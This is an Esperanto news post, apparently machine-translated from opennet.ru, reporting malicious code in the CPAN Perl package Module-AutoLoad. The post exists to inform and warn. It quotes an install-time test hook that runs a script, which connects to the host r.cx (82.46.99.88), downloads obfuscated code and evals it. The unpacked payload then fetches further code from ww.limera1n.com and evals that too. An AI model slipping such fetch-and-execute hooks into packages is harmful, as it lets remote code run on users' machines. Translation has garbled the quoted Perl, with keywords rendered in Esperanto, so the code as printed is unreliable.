ProHoster > Блог > interretaj novaĵoj > Malica kodo detektita en Module-AutoLoad Perl-pakaĵo

Malica kodo detektita en Module-AutoLoad Perl-pakaĵo

En Perl-pakaĵo distribuita per la CPAN-dosierujo Modulo-Autoload, dizajnita por aŭtomate ŝarĝi CPAN-modulojn sur la flugo, identigita malica kodo. La malica enmeto estis trovita en la testa kodo 05_rcx.t, kiu sendas ekde 2011.
Estas rimarkinde, ke demandoj pri ŝarĝo de dubinda kodo aperis sur Stackoverflow reen en 2016.

Malica agado resumiĝas al provo elŝuti kaj ekzekuti kodon de triaparta servilo (http://r.cx:1/) dum la ekzekuto de testaro lanĉita dum la instalado de la modulo. Oni supozas, ke la kodo komence elŝutita de la ekstera servilo ne estis malica, sed nun la peto estas redirektita al la domajno ww.limera1n.com, kiu provizas sian parton de la kodo por ekzekuto.

Por organizi la elŝuton en dosiero 05_rcx.t La sekva kodo estas uzata:

mia $prog = __DOSIERO__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
mia $provo = `$^X $prog`;

La specifita kodo kaŭzas la skripton esti ekzekutita ../contrib/RCX.pl, kies enhavo estas reduktita al la linio:

uzu lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1″};

Ĉi tiu skripto ŝarĝas konfuzita uzante la servon perlobfuscator.com kodon de la ekstera gastiganto r.cx (karakterkodoj 82.46.99.88 respondas al la teksto "R.cX") kaj plenumas ĝin en la eval-bloko.

$ perl -MIO::Socket -e'$b=nova IO::Socket::INET 82.46.99.88.":1″; presi <$b>;'
eval malpaki u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE....}

Post malpakado, la sekvanta estas finfine efektivigita: kodo:

print{$b=nova IO::Socket::INET"ww.limera1n.com:80″}"GET /iJailBreak
";evalor return warn$@dum$b;1

La problema pako nun estis forigita de la deponejo. PAUSEZO (Perl Authors Upload Server), kaj la konto de la modulaŭtoro estas blokita. En ĉi tiu kazo, la modulo ankoraŭ restas disponebla en la MetaCPAN-arkivo kaj povas esti rekte instalita de MetaCPAN uzante kelkajn ilojn kiel ekzemple cpanminus. Ĝi estas notitake la pakaĵo ne estis vaste disvastigita.

Interese diskuti konektis kaj la aŭtoro de la modulo, kiu neis la informon, ke malica kodo estis enigita post kiam lia retejo "r.cx" estis hakita kaj klarigis, ke li nur amuziĝas, kaj uzis perlobfuscator.com ne por kaŝi ion, sed por redukti la grandecon. de la kodo kaj simpligante ĝian kopiadon per la tondujo. La elekto de la funkcionomo "botstrap" estas klarigita per la fakto, ke ĉi tiu vorto "sonas kiel bot kaj estas pli mallonga ol bootstrap". La aŭtoro de la modulo ankaŭ certigis, ke la identigitaj manipuladoj ne faras malicajn agojn, sed nur pruvas la ŝarĝon kaj ekzekuton de kodo per TCP.

fonto: opennet.ru

Aldoni komenton